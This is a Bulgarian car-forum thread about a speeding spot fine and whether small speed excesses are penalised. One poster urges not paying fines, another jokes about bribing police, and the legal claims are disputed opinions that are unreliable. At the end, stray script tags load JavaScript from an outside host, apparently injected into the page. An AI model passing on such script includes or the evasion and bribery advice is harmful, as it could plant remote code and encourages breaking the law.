Въпросче за фиш за превишена скорост
Започната от Lorinser, 05 юни 2009 - 23:13:05
21 мнения по тази тема
Публикувано 05 юни 2009 - 23:13
Пичове, друснаха ме фуражките...
Карам си аз смело в Нови пазар, хората ми светкат, и аз намалям под 70км/ч, защото си знам че 19км/ч превишение на скоростта немогат да напишат акт, ОБАЧЕ ме спират...
Ф:превишена скорост!
Аз: С колко?
Ф:с 14 км/ч!!
Аз: ОК, пишете АКТ...
Ф: абе тооо, има и друг вариянт....
Аз: пари не давам.
Ф: не нее, препоръчваме Ви, фиш..
Аз: ок.. все ми е тая...
Ф: подпишете се..
И аз се подписах и си викам чакай са да видя как ще ме глобяват за 14км/ч... и кога гледам, НИКЪДЕ не пише километри и ограничения... само някакви точки и алинеи, които съм нарушил и с които съм се съгласил.. ужас.
Та на въпроса, наистинали глобяват за превишаване с 11км?? или май съм се подписал че съм превишил с 20км/ч ??
Глобата е 30лв, не ми е проблем, НО да попитам какво ще стане ако не я платя? утре ми е последен ден и трябва да платя, пише 7дневен срок.
Има ли давност фиша??
Карам си аз смело в Нови пазар, хората ми светкат, и аз намалям под 70км/ч, защото си знам че 19км/ч превишение на скоростта немогат да напишат акт, ОБАЧЕ ме спират...
Ф:превишена скорост!
Аз: С колко?
Ф:с 14 км/ч!!
Аз: ОК, пишете АКТ...
Ф: абе тооо, има и друг вариянт....
Аз: пари не давам.
Ф: не нее, препоръчваме Ви, фиш..
Аз: ок.. все ми е тая...
Ф: подпишете се..
И аз се подписах и си викам чакай са да видя как ще ме глобяват за 14км/ч... и кога гледам, НИКЪДЕ не пише километри и ограничения... само някакви точки и алинеи, които съм нарушил и с които съм се съгласил.. ужас.
Та на въпроса, наистинали глобяват за превишаване с 11км?? или май съм се подписал че съм превишил с 20км/ч ??
Глобата е 30лв, не ми е проблем, НО да попитам какво ще стане ако не я платя? утре ми е последен ден и трябва да платя, пише 7дневен срок.
Има ли давност фиша??
Публикувано 05 юни 2009 - 23:53
Здравей колега. Да ти го кажа направо-аз такива работи като фишове не плащам. Направо ги мачкам и ги хвърлям след като се кача в колата.ПРИЧИНАТА-нищо не ми е дала държавата че аз да и давам на нея.Ако ме разбираш какво искам да ти кажа . Моят съвет- трай си и тва е не сме в Германия да ни зВънят по вратите да си търсят глобите като наследство.А
И като гледам скоро няма и да ги стигнем немците...
ама тва е положението.Ама и ти си прецини все пак.АЗ лично до сега фиш не съм плащал.----- И като се замисля ........
и акт не съм плащал. Това е от мен. ПС . да не спамя темата ама скоро ще те търся за фарове

Публикувано 06 юни 2009 - 00:03
Забравих да ти кажа -- нищо няма да стане като не платиш.За давност не знам а и не съм се интересувал.Ти като си чупиш колата по дупките кво става---- едно голямо НИЩО.
Ама тва е друга тема за разговори. Поздрави.

Публикувано 06 юни 2009 - 23:21
Ами да Ви кажа кво свърших---платих го! Колкото и да не ми се искаше, колкото и да псувах дупките които целих точно преди Нови Пазар...
Лошото е че си плащам и винетки и глоби и данъци като поп, а условия за каране като в зоопарка....
Сигурно ще е последния фиш който плащам !
sam иначе съм на твоето мнение! така си е!
Лошото е че си плащам и винетки и глоби и данъци като поп, а условия за каране като в зоопарка....
Сигурно ще е последния фиш който плащам !
sam иначе съм на твоето мнение! така си е!
Публикувано 08 юни 2009 - 13:16
Бояне, само за протокола 2-3 думи по въпроса:
Не ти препоръчвам да лежиш на тази кълка, че не глобявали за превишение на скоростта до 20 км.ч. Първо, няма глоба само до 10км.ч. превишение, а не 20. Между 10 и 20 глобата е 30 лева, колкото са ти наложили. Но истината е, че ако решат, имат право да те глобят и за 3 км.ч. превишение на скоростта, защото не спазваш пътни знаци. Тогава глобата е 20 лева.
Според мен правилно си платил фиша. Колегата САМ-1 може и да е прав, че никой няма да те потърси, но това не значи, че няма да има последствия за теб. Ще влезеш в компютрите на КАТ, където ще ти висят едни 30 лева задължение и в следващите 2 години нямаш право на никаква административна услуга оттам. Утре ще забравиш за този дълг, ще отидеш да си сменяш книжката, ще чакаш 1 час на опашка и накрая ще ти откажат, докато не платиш. После пак чакай и хаби нерви и време - според мен не си заслужава за 30 лева.
И последно, горещо ти препоръчвам да си пазиш бележката за платената глоба. КАТ имат един проблем - глобата с фиш се води в техните компютри, но се плаща по сметки на НАП. Връзката между КАТ и НАП често куца - има случаи, когато платеното в НАП не е отразено в компютрите на КАТ. Тогава се доказва плащането с бележката. Аз съм един от тези случаи, имах платени глоби за няколко години общо за 280 лева, а в компютрите на КАТ си стояха като неплатени. Добре че по случайност пазех бележките за платените глоби отпреди години.
Не ти препоръчвам да лежиш на тази кълка, че не глобявали за превишение на скоростта до 20 км.ч. Първо, няма глоба само до 10км.ч. превишение, а не 20. Между 10 и 20 глобата е 30 лева, колкото са ти наложили. Но истината е, че ако решат, имат право да те глобят и за 3 км.ч. превишение на скоростта, защото не спазваш пътни знаци. Тогава глобата е 20 лева.
Според мен правилно си платил фиша. Колегата САМ-1 може и да е прав, че никой няма да те потърси, но това не значи, че няма да има последствия за теб. Ще влезеш в компютрите на КАТ, където ще ти висят едни 30 лева задължение и в следващите 2 години нямаш право на никаква административна услуга оттам. Утре ще забравиш за този дълг, ще отидеш да си сменяш книжката, ще чакаш 1 час на опашка и накрая ще ти откажат, докато не платиш. После пак чакай и хаби нерви и време - според мен не си заслужава за 30 лева.
И последно, горещо ти препоръчвам да си пазиш бележката за платената глоба. КАТ имат един проблем - глобата с фиш се води в техните компютри, но се плаща по сметки на НАП. Връзката между КАТ и НАП често куца - има случаи, когато платеното в НАП не е отразено в компютрите на КАТ. Тогава се доказва плащането с бележката. Аз съм един от тези случаи, имах платени глоби за няколко години общо за 280 лева, а в компютрите на КАТ си стояха като неплатени. Добре че по случайност пазех бележките за платените глоби отпреди години.
Публикувано 11 юни 2009 - 17:39
Малко светлина по отношение на ФИШОВЕТЕ ако нямате нищо против. По добре е ФИШ от колкото АУАН или АКТ. При положение, че ти съставят фиш и го платиш в 7-дем дневен срок си спестяваш отнемане на контролни точки. На основание чл. 186 ал. 4 от ЗДП гласи ,че глобата по който не е платена в доброволните 7-дем дневен срок от датата на издаването му се смята за влязло в сила наказателно постановление. Та за маловажни нарушения до 50 лв. може да се съставя ФИШ. Което ще рече ,че за следните нарушения при който се отнемат и контролни точки искаите да ви пишат фиш и след като го платите в срок си запазвате точките. Без колан, Разговор по мобилен телефон безустройство за свободни ръце, Нарушава знак забранено влизонето, Не спира на знак" Спри и пропуснидвижещи се по пътя с предимство , неправилно престоява или е паркирал на пешеходна пътека, неправилен превоз на деца без системи за обезопасяване. и доста такива. Това според мен е едно предимство което не трябва да се пропуска но последната дума е на клиента.
Публикувано 11 юни 2009 - 18:20
Адаш, въпросче имам аз:
Искаш да кажеш, че не си имал 20 лева в джоба, когато си бил там....?
Да беше дал на куките да се почерпят, щеше да си с 10 лева напред...
А сега плати 30...
А сега плати 30...
Audi A8
Публикувано 11 юни 2009 - 19:08
Абсолютно точноБояне, само за протокола 2-3 думи по въпроса:

Публикувано 11 юни 2009 - 22:49
Тука за 3-те км/ч бързам да не се съглася! Има си грешка в прибора за която водача не носи отговорност и тя е до 10%, за целта за да бъдеш глобен за 3 км/ч трябва някъде в междублоково пространство, където е скоростта по закон е 20 км/ч(със знак можеда бъде ограничена до 5 км/ч) да седят с радр, а ти да караш с 23 км/ч, обаче радара няма тая чуствителност при толкова ниска скорост.Бояне, само за протокола 2-3 думи по въпроса:
Не казвам, че не могат да те глобят за 3 км/ч превишение, ама е много трудно да се случи тая работа, най-малко 10 км/ч може да задейства полицаите и то ако има някакъв капан, като на пример ограничението от 4-ти киломтър към ракова болница от 40 км/ч заради пешаходните пътеки. Един колега си батиса книжката за месц на тая отсечка, щото го барнаха да кара със 70 км/ч.
Mercedes-Benz - Unlike any other!
Публикувано 11 юни 2009 - 22:58
Адаш, въпросче имам аз:
А сега плати 30...
аз пари имах, но бях сигурен че немогат да ме шибнат за 14км/ч превишение, мислех си, че минимумът е 20км/ч.
а и да знаех-нямаше пак да им дам, щом са толкова докачливи и стриктни, че да ме спират за 14км/ч.
свършена история--за напред вече знам...
ако знаех, че е реален фиша, преди да го подпиша, щях да им поискам документ-удостоверение, за годишния преглед на радара.
Публикувано 17 юни 2009 - 10:10
Колега, съгласен съм че на практика никой не глобява за 3 км.ч превишение. Но на теория /и по закон/ би могъл, ако реши да се заяжда. Категорично не съм съгласен, че по закон не се носи отговорност за превишение на скоростта с по-малко от 10 км.ч. Ако ми кажеш къде го пише това, или пък другото за грешката в прибора - ще те черпя каса бира /може и направо да я дам на Лоринзер, че му я дължиш от една друга темаТука за 3-те км/ч бързам да не се съглася! Има си грешка в прибора за която водача не носи отговорност и тя е до 10%...

Публикувано 17 юни 2009 - 10:45
Не споря, носи се отговорност за превишаване с по-малко от 10 км/ч според закона, обаче доказването на превишението е почти невъзможно.Колега, съгласен съм че на практика никой не глобява за 3 км.ч превишение. Но на теория /и по закон/ би могъл, ако реши да се заяжда. Категорично не съм съгласен, че по закон не се носи отговорност за превишение на скоростта с по-малко от 10 км.ч. Ако ми кажеш къде го пише това, или пък другото за грешката в прибора - ще те черпя каса бира /може и направо да я дам на Лоринзер, че му я дължиш от една друга тема
/
За грешката на уреда тук има изказване на депутат(чети към края), което знам няма да приемеш като факт, но съм сигурен, че съм чел подобно нещо ако не в самия закон, то в някоя от наредбите за прилагане. Ако успея да се сетя или намеря нещо ще пратя.
Ти си юрист и щом казваш че няма такова нещо с 10% аз слушам и внимавам. Може да е имало преди и вече да не е в сила.
Публикувано 18 юни 2009 - 16:08
Колега, и аз мисля, че нямаме спор на практика. Ясно е, че няма кой да те глоби за 10 км.ч. превишение, но бях длъжен да предупредя, че това не е изрично записано в закона.Не споря, носи се отговорност за превишаване с по-малко от 10 км/ч според закона, обаче доказването на превишението е почти невъзможно.
За грешката на уреда тук има изказване на депутат(чети към края), което знам няма да приемеш като факт, но съм сигурен, че съм чел подобно нещо ако не в самия закон, то в някоя от наредбите за прилагане. Ако успея да се сетя или намеря нещо ще пратя.
Ти си юрист и щом казваш че няма такова нещо с 10% аз слушам и внимавам. Може да е имало преди и вече да не е в сила.
А за изказването на депутата - то е като на много други, слушал съм ги повечето. Особено през пролетта на 2007г., когато този дебат беше в разгара си. И са прави тези депутати - действително радарът може да отчете грешка, затова е прието да се даде известен толеранс за превишение. Прието е да е 10 км.ч., а в някои държави 30 км.ч. Само че в белите държави в някой закон изрично пише - "не се глобява до 10 км.ч. превишение" или "глобява се за повече от 10 км.ч. превишение" или нещо подобно. А при нас остана едно никакво положение - хем на практика не глобяваме до 10 км.ч. превишение, хем не го записахме никъде като изричен текст.
Публикувано 18 юни 2009 - 16:28
В заключение, за да не се обърка някой:Колега, и аз мисля, че нямаме спор на практика. Ясно е, че няма кой да те глоби за 10 км.ч. превишение, но бях длъжен да предупредя, че това не е изрично записано в закона.
А за изказването на депутата - то е като на много други, слушал съм ги повечето. Особено през пролетта на 2007г., когато този дебат беше в разгара си. И са прави тези депутати - действително радарът може да отчете грешка, затова е прието да се даде известен толеранс за превишение. Прието е да е 10 км.ч., а в някои държави 30 км.ч. Само че в белите държави в някой закон изрично пише - "не се глобява до 10 км.ч. превишение" или "глобява се за повече от 10 км.ч. превишение" или нещо подобно. А при нас остана едно никакво положение - хем на практика не глобяваме до 10 км.ч. превишение, хем не го записахме никъде като изричен текст.
В закона за движение по пътищата не е отбелязано, че не можете да бъдете глоби за превишение под 10 км/ч.
Потвърдено от willy555(юрист), тъй че внимавайте.
Публикувано 18 юни 2009 - 21:56
за отбелязване е и следното:
при контрол по скоростните режими/както в МВР се нарича работата с т.нар. радар/ в градски условия се задава толеранс на уреда от 11 км/ч а в извънградски условия 21км/ч. примерно : извънградско , ограничение 90 км/ч , уреда подава сигнал при скорост по-голяма от 111 км/ч.
при контрол по скоростните режими/както в МВР се нарича работата с т.нар. радар/ в градски условия се задава толеранс на уреда от 11 км/ч а в извънградски условия 21км/ч. примерно : извънградско , ограничение 90 км/ч , уреда подава сигнал при скорост по-голяма от 111 км/ч.
W201 M102.962 <script
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
1 потребител(и) четат тази тема
0 потребители, 1 гости, 0 анонимни